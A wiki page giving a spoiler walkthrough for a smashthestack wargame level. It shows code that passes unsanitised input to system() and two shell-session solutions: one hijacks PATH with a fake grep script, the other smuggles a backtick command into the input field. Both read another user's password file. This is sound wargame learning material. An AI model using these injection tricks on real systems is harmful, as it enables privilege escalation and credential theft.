MRL Wiki	Main Page | About | Help | FAQ | Special pages | Log in
	Printable version | Disclaimers | Privacy policy

Level 3

From MRL Wiki

blackbox.smashthestack.org - level 3

Spoilers Below

The proclist binary accepts an argument from stdin, which is appended to a string that is passed as an argument to system().

10: std::cin >> program;
...
21: command = "/bin/ps |grep ";
22: command += program;
23: system(command.c_str());

The tricky part is a rudimentary character filter, which successfully filters out any of the following characters:

;^&|><

There turned out to be multiple ways to accomplish this level, and there are probably further variations on the examples below.

level3@blackbox:/tmp/tyler3$ cat > grep
#!/bin/sh
/bin/cat /home/level4/password
level3@blackbox:/tmp/tyler3$ chmod a+x ./grep
level3@blackbox:/tmp/tyler3$ export PATH=.
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: a
<password displays>

level3@blackbox:/tmp/tyler3$ touch password
level3@blackbox:/tmp/tyler3$ chmod 777 password
level3@blackbox:/tmp/tyler3$ cat > getpass
#!/bin/sh
cat /home/level4/password > /tmp/tyler3/password
level3@blackbox:/tmp/tyler3$ chmod a+x getpass
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: `./getpass`
Usage: grep [OPTION]... PATTERN [FILE]...
Try `grep --help' for more information.
level3@blackbox:/tmp/tyler3$ cat password
<password displays>

Edit this page | Discuss this page | Page history | What links here | Related changes Main Page | About MRL Wiki | Find: This page has been accessed 47 times. This page was last modified on 5 September 2008, at 18:14.